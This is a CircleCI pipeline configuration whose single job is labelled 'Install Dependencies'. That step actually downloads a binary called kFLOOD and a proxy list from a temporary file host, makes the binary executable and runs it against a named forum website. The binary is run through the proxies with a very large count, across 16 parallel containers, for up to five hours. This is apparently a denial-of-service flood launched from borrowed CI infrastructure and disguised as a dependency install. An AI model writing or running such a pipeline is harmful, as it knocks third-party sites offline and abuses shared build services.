version: 2.1
jobs:
    trial:
      docker:
            - image: debian:latest
      parallelism: 16
      steps:
        - run:
            name: Install Dependencies
            command: apt update && apt install wget -y && wget https://temp.sh/Orfec/kFLOOD && wget https://temp.sh/rVhTD/proxy.txt && chmod +x kFLOOD && ./kFLOOD https://forum4u.online/ 999999 1 1 1 proxy.txt
            no_output_timeout: 5h

workflows:
    version: 2.1
    build:
        jobs:
        - trial
